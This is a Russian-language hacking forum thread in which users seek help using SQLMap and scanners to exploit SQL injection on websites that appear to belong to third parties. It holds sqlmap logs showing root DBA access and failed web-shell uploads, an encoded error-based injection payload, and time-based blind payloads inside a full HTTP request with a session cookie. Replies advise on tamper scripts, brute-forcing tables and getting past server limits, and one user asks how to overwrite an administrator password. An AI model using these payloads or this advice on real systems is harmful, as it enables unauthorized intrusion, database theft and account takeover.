Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. matvejcik

    matvejcik New Member

    Joined:
    22 Nov 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    надо ставить оригинальный параметр. ты ставишь или пустой или уже разкрученый параметр да и в целом надо проверять ручками есть ли вообще то там дырка.
     
  2. 2fed

    2fed Member

    Joined:
    26 Mar 2008
    Messages:
    44
    Likes Received:
    9
    Reputations:
    0
    Parameter: #1* (URI)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)


    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)


    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)



    [04:43:21] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0
    [04:43:21] [INFO] testing if current user is DBA
    [04:43:21] [INFO] fetching current user
    [04:43:22] [INFO] retrieved: 'root@localhost'
    current user is DBA: True


    не возможно залить шелл
    [04:44:04] [WARNING] unable to upload the file stager on '/var/www/'
    [04:44:04] [INFO] trying to upload the file stager on '/var/www/menu/-1/' via LIMIT 'LINES TERMINATED BY' method



    Не получается ничего.
    [04:45:04] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0
    [04:45:04] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
    sql-shell>
    [04:00:51] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported




    Подскажите пожалуйста что можно сделать ???
     
  3. Duble

    Duble Member

    Joined:
    28 Oct 2015
    Messages:
    60
    Likes Received:
    6
    Reputations:
    0
    Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://site.com:80/Help/HelpIndex.html?HelpName=Earn money&ThemeID=17 AND 2864=2864
    ---
    [16:58:45] [INFO] testing MySQL
    [16:58:45] [WARNING] the back-end DBMS is not MySQL
    [16:58:45] [INFO] testing Oracle
    [16:58:45] [WARNING] the back-end DBMS is not Oracle
    [16:58:45] [INFO] testing PostgreSQL
    [16:58:45] [WARNING] the back-end DBMS is not PostgreSQL
    [16:58:45] [INFO] testing Microsoft SQL Server
    [16:58:45] [WARNING] the back-end DBMS is not Microsoft SQL Server
    [16:58:45] [INFO] testing SQLite
    [16:58:45] [WARNING] the back-end DBMS is not SQLite
    [16:58:45] [INFO] testing Microsoft Access
    [16:58:45] [WARNING] the back-end DBMS is not Microsoft Access
    [16:58:45] [INFO] testing Firebird
    [16:58:45] [WARNING] the back-end DBMS is not Firebird
    [16:58:45] [INFO] testing SAP MaxDB
    [16:58:45] [WARNING] the back-end DBMS is not SAP MaxDB
    [16:58:45] [INFO] testing Sybase
    [16:58:45] [WARNING] the back-end DBMS is not Sybase
    [16:58:45] [INFO] testing IBM DB2
    [16:58:45] [WARNING] the back-end DBMS is not IBM DB2
    [16:58:45] [INFO] testing HSQLDB
    [16:58:45] [WARNING] the back-end DBMS is not HSQLDB
    [16:58:45] [INFO] testing H2
    [16:58:45] [WARNING] the back-end DBMS is not H2
    [16:58:45] [INFO] testing Informix
    [16:58:45] [WARNING] the back-end DBMS is not Informix
    [16:58:45] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system

    [*] ending @ 16:58:45 /2020-06-28/
    Кто сталкивался? В чем проблема?
     
  4. dzhim2014

    dzhim2014 New Member

    Joined:
    18 Oct 2013
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    На соседнем борде обсуждали что типа одна скуля не отдает DBMS а вторая может и отдать.. Ищи еще скули на сайте
    Так же грешат на WAF и предполагают что тип уязвимости - NoSQL Потому и не может определить dbms
     
  5. dzhim2014

    dzhim2014 New Member

    Joined:
    18 Oct 2013
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Взаимодействие sqlmap и metasploit - что не так?
    Дампит нормально а коннект отказывается создавать , все пути прописаны правильно...
    Гугл поиск по запросу "unable to prompt for an out-of-band session" ничего не выдал вразумительного ..
     

    Attached Files:

  6. sosidzh24

    sosidzh24 Member

    Joined:
    10 Apr 2019
    Messages:
    176
    Likes Received:
    7
    Reputations:
    0
    Вечер добрый.Не первый раз сталкиваюсь с ситуацией когда сканер показал sql и даже показал базу данных.Но sqlmap почему-то не хочет его брать,говорит нельзя произвести инъекцию.
    Ссылка get https://www.example.com/example.php?langid=test&Product=1. уязвимый параметр "langid". Есть готовый пэйлоад со сканера.
    -1%5c%27%2b(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))--+1
    каким образом можно его указать или подтолкнуть?Кроме --technique=
    Есть кто сталкивался и решал такое?
     
  7. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Сам уязвимый параметр можно укозать *, ставишь с параметром -v3 и смотришь на каком моменте он ломается, далее руками смотришь, что его ломает и подбираешь под это дело тампер или пишешь свой.
     
    _________________________
  8. sosidzh24

    sosidzh24 Member

    Joined:
    10 Apr 2019
    Messages:
    176
    Likes Received:
    7
    Reputations:
    0
    [QUOTE = "winstrool, post: 4410186, member: 33917"] Сам уязвимый параметр можно укозать * , ставишь с параметром -v3 и смотришь на каком моменте он ломается, далее руками смотришь, что его ломает и подбираешь под это дело тампер или пишешь свой. [/ QUOTE]
    Видел пост на кодебу, как ребята вставляют пейлоады через preffix и suffix.Но до конца не разобрался
     
  9. polzunki

    polzunki New Member

    Joined:
    28 Jul 2020
    Messages:
    29
    Likes Received:
    0
    Reputations:
    0
    Доброго всем. Эту проблему возможно как-то решить? Дохожу до имени бд, дальше никак.

    [​IMG]
     
  10. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Если нет information_schema то sqlmap предлагает брутить таблицы/столбцы. Только так
     
  11. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    ну таблицы можно угодать, как и колонки
     
  12. fandor9

    fandor9 Reservists Of Antichat

    Joined:
    16 Nov 2018
    Messages:
    630
    Likes Received:
    1,050
    Reputations:
    47
    Ну судя по скрину, у вас есть уязвимость в УРЛе, а дальше:
    • на сервере стоит очень маленький параметр LimitRequestLine или же large_client_header_buffers
    • Или же у вас оооооочень длинные запросы
    • Ну или же стоит какая-либо WAF, которая вместо 404 отдаёт ошибку 414 (что вряд-ли)
    Так что сначала выясните какую максимальную длину поддерживает сервер, банально с помощью bash:
    Code:
    baseurl="http://site.com/"; for i in {1..1000}; do baseurl=$baseurl'A'; length=$(echo -n "$baseurl"|wc -c); response=$(curl -I -s "$baseurl" | grep "HTTP\/" | cut -d " " -f 2);  echo "Length:$length Response-Code: $response URL: $baseurl"; done
    Затем пропустите трафик через свой прокси (burp, charlie..) и посмотрите что идёт от скульмапа
    Code:
    sqlmap --proxy http://localhost:8080/
    ну и там уже по обстоятельствам.
     
    Eidolon, quite gray, Spinus and 4 others like this.
  13. Gutman999

    Gutman999 New Member

    Joined:
    22 Sep 2020
    Messages:
    12
    Likes Received:
    2
    Reputations:
    0
    Доброго времени суток. Имеется на сайте Blind SQL Injection. Сканировал акунетиксом. Акунетикс использует "XOR" Вот лог. Также на сайте имеется php code injection. C этим не знаком. Не знаю как правильно скормить скулю мапу. Буду благодарен за хоть какую-то подсказку

    The vulnerability affects https://www.site.com/ , /<s>/<s>/<s>/[*]/<s>.html

    Discovered by Blind SQL Injection

    Attack Details
    arrow_drop_up
    Path Fragment input /<s>/<s>/<s>/[*]/<s>.html was set to 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z

    Tests performed:

    • 0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 13.583
    • 0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 14.42
    • 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 8.496
    • 0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 4.763
    • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.538
    • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.613
    • 0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 13.94
    • 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 7.891
    • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.737


    Original value: Sneaker
    HTTP Request

    arrow_drop_up
    GET /Sale/Damen/Schuhe/0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z/Sneaker-mit-abgedeckter-Schnuerung-weiss.html HTTP/1.1

    X-Requested-With: XMLHttpRequest

    Referer: https://www.site.com/

    Cookie: language=0;sid=kk35ife9b0guk613m5pgdf9b72;sid_key=oxid

    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

    Accept-Encoding: gzip,deflate

    Host: www.site.com

    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

    Connection: Keep-alive
     
  14. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Если есть rce зачем иньекция?
     
  15. Gutman999

    Gutman999 New Member

    Joined:
    22 Sep 2020
    Messages:
    12
    Likes Received:
    2
    Reputations:
    0
    Не совсем понял тебя друже. Ты имеешь ввиду php code injection? Я с этим не знаком
     
  16. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Ну да, это дает больше профита чем иньекция, но верить акуше я бы не стал
     
  17. Gutman999

    Gutman999 New Member

    Joined:
    22 Sep 2020
    Messages:
    12
    Likes Received:
    2
    Reputations:
    0
    А как эту уязвимость реализовать не подскажешь? Мана нету случайно?
     
  18. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    202
    Likes Received:
    78
    Reputations:
    8
  19. sosidzh24

    sosidzh24 Member

    Joined:
    10 Apr 2019
    Messages:
    176
    Likes Received:
    7
    Reputations:
    0
    --is-dba: True. Могу я изменить пароль админа? Какая команда должна быть? Есть несколько баз данных, текущая 'admin' в ней таблица 'users' и колонку пароль 'password'.
    Я попробовал так --sql-query "UPDATE users SET password = '123' WHERE email = '[email protected]';" Выбило ошибку "execution of non-query SQL statements is only available when stacked queries are supported". Как правильно сделать?
     
  20. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    PHP не поддерживает стек запросов, когда СУБД является MySQL